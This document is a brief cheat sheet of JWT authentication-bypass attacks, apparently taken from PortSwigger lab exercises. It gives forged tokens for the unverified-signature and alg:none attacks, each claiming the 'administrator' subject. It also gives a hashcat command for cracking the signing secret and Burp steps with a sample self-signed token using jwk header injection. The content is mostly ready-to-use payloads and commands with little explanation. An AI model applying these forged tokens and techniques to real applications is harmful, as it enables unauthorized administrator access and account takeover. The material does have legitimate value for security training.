JWT

Unverified signature auth bypass

# Leave out the signature part of the cookie or change some values 
  and check if it redirects to login or not

eyJraWQiOiIyYjRmMGUyZi04OTk4LTRlMDYtOTI4Ni1kZGY1YTE3NTczMDgiLCJhbGciOiJSUzI1NiJ9.ewogICJpc3MiOiAicG9ydHN3aWdnZXIiLAogICJzdWIiOiAiYWRtaW5pc3RyYXRvciIsCiAgImV4cCI6IDE2OTY4NjAxNTQKfQ.

None algorithm attack

# Add alg:none to header and leave out trailing signature
ewogICJraWQiOiAiZjZjMWFmYWYtMmFhNS00NjBlLWFlMzQtMGEwMmI0ZDQ1ZWVjIiwKICAiYWxnIjogIm5vbmUiCn0.ewogICJpc3MiOiAicG9ydHN3aWdnZXIiLAogICJzdWIiOiAiYWRtaW5pc3RyYXRvciIsCiAgImV4cCI6IDE2OTY4NjEyNTIKfQ.

Crack JWT secret

# Hashcat
hashcat -a 0 -m 16500 <JWT token file> <wordlist>

Self-signed JWT via jwk header injection

# Generate new RSA key in JWT editor in Burp
# Switch to JSON web token view in Burp repeater
# Change JWT payload and click attack
# Observe application's response
# Example of self-signed JWT token
eyJraWQiOiJhMGY3NjJhNi1kMjllLTQzODktODNkMy0wYzJhMzVkYWJlZWQiLCJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp3ayI6eyJrdHkiOiJSU0EiLCJlIjoiQVFBQiIsImtpZCI6ImEwZjc2MmE2LWQyOWUtNDM4OS04M2QzLTBjMmEzNWRhYmVlZCIsIm4iOiJ6QkZlUHcwNVRJYl9QWnhnbFlEaHdNaUJnOXd0WHlwYjZFZ2l6YVJycXlGWnVJcEhMOHYzUGhDSVZUQkZPbFlyUmRuT1FSNENRazlzajNhWDMwSFNqT2p5dHZFaFJCYTlpenZNUGl3eU1yMS1HcS1vU19MRGpHdEZ1SURXWnoycnRZeVRxY05QYWhsSnFXcHlzbS1nVk1ZWjBSVS1fRFF5MmxncENWRDE5RmFlZ0Z0OVJVUlloRE5xOW1rOUVYZENIdi1fN1h1RFBhNlh2YXlKLVROcUU4WHBoVGcyel9CNVoyU1k3ZUhMeHprRmdydzIxay1TWDRnUHROWDZydXIyNklaSmxsdHpESmViZlk1TkZRMlplcUphaldRR1FTY3Z5eHpXclhhaDdad1pvaXFqaW0tX29EcXplOG9RNEMzSVBKMGZQYk45TUNYTk9wdEJUTkdFaHcifX0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2OTY4NjM3MTR9.vMTme9GhtvIFxLwQLVYCr-x2LB3cTwoU_65uxDivdykSzQmos2BXeSxyZ1bvYi9bPhDMS84jzE78gmOga8YWqIBSsCHtc56qcRVu1ONhOEhUF7bPC4zQU9PT9Lb6q9rsMmo9LcK7jlLD0GohqhIjsNk-d2hEao-jf8SzDhyMZGEt1kbUqi-MOOc7zwLKnTeuZAu3wKs_TcRhv8WwxH3QtX9wpZEWbZLWobYVoksasthkDHarnGgpnMDolAUUfzWISH-LaCTFEkDxa6IabT8FXMKxVYgU1GHx5YvPOQIpYltfj5MZXDl02XwEqsnSOr0xvZueEHJXQDoi-1tNWyIfIA